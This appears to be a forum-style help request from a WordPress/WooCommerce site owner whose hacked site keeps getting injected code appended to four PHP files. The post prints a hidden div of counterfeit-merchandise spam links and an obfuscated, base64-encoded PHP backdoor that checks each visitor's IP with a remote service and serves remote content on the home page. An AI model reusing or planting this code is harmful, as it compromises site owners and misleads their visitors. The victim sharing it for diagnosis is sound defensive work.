I have a website created using Wordpress and used WooCommerce as the cart plugin. Recently I found it hacked, as it responded to an ajax request with a HTML code, which should receive a JSON object as the response. As I check the source files, no files were replaced, but I found some unusual codes appended at the end inside 4 php files, including
- wp-blog-header.php in the root directory
- bookmark.php in wp-includes directory
- header.php and footer.php in the theme directory
Following is the code that I found.
echo '<html>
<div style=\'left: -3565px; position: absolute; top: -4812px\'>
<a href="http://ift.tt/1v7mT1S">Youth Soccer Jerseys Wholesale</a>
<a href="http://ift.tt/1zZFoLA">Buy NFL Jerseys Wholesale</a>
<a href="http://ift.tt/1v7mT1T">Cheap Raider Jerseys</a>
<a href="http://ift.tt/1zZFnqP">Coach Canada Stores Online</a>
<a href="http://ift.tt/1v7mVqr">Womens Andrew Luck Limited Super Bowl Jersey</a>
<a href="http://ift.tt/1zZFp1X">Jerseys For Cheap</a>
<a href="http://ift.tt/1v7mT1U">Cheap Youth Soccer Jerseys</a>
<a href="http://ift.tt/1zZFnr2">Cycling Jerseys Cheap</a>
<a href="http://ift.tt/1v7mT1X">Kids Rob Gronkowski Pink Jersey</a>
<a href="http://ift.tt/1zZFnHj">Coach Handbags Marketing Strategy</a>
<a href="http://ift.tt/1zZFp1Y">Coach Purses Numbers</a>
<a href="http://ift.tt/1v7mTic">Wholesale Baseball Jerseys</a>
<a href="http://ift.tt/1v7mVqu">Youth Bobby Wagner Seahawks Jersey</a>
<a href="http://ift.tt/1zZFp21">Coach Glasses Outlet</a>
<a href="http://ift.tt/1v7mTid">Randall Cobb Navy Super Bowl Jersey</a>
<a href="http://ift.tt/1zZFnHw">Cheap Hockey Jerseys China</a>
<a href="http://ift.tt/1v7mTig">Coach Factory Kenosha Wi</a>
<a href="http://ift.tt/1zZFnHz">Wholesale Hockey Jerseys</a>
<a href="http://ift.tt/1v7mTih">Buy Jerseys Cheap</a>
<a href="http://ift.tt/1zZFp28">Cheap Dallas Stars Jerseys</a>
<a href="http://ift.tt/1v7mVqv">Cheap Kids NFL Jerseys</a>
<a href="http://ift.tt/1zZFnXQ">Cheap Baseball Jerseys From China</a>
<a href="http://ift.tt/1v7mTii">Coach Factory National Harbor</a>
</div></html>';
And I found following code which is not wordpress.
function q0($h1){$w2=curl_init();curl_setopt($w2,CURLOPT_URL,$h1);curl_setopt($w2,CURLOPT_RETURNTRANSFER,TRUE);$i3=curl_exec($w2);return $i3;}$h1=base64_decode('aHR0cDovL3d3dy5ncmVlbmhlYXJ0dWFlLmNvbS93cC1pbmNsdWRlcy9saWNlbnNlLnR4dA==');$d4=file_get_contents(base64_decode('aHR0cDovL2lwLm11c2VvdmlydHVhbGUubmV0L2NnaS1iaW4vaXBjaGVjay5jZ2k/aXA9').$_SERVER[base64_decode('UkVNT1RFX0FERFI=')]);if($_SERVER[base64_decode('UkVRVUVTVF9VUkk=')]==base64_decode('Lw==') ||$_SERVER[base64_decode('UkVRVUVTVF9VUkk=')]==base64_decode('L2luZGV4LnBocA==')){if($d4){if($d4==base64_decode('ZmFsc2U=') or $d4==base64_decode('Zm9yYmlkZGVu') or $d4==base64_decode('Rm9yYmlkZGVu')){echo '';}else{echo file_get_contents($h1);exit;}}else{$d4=q0(base64_decode('aHR0cDovL2lwLm11c2VvdmlydHVhbGUubmV0L2NnaS1iaW4vaXBjaGVjay5jZ2k/aXA9').$_SERVER[base64_decode('UkVNT1RFX0FERFI=')]);if($d4==base64_decode('ZmFsc2U=') or $d4==base64_decode('Zm9yYmlkZGVu') or $d4==base64_decode('Rm9yYmlkZGVu')){echo '';}else{echo q0($h1);exit;}}}
I cleaned up those files and changed wp-admin, cpanel and ftp passwords, but the above code showed up in those files, but this time with different links.
I'm still trying to figure out if there is a script within the server which exploits the source files.
Is there any plugins or something that I should use to prevent this?
Please help me to solve this. Thanks in advance.
Aucun commentaire:
Enregistrer un commentaire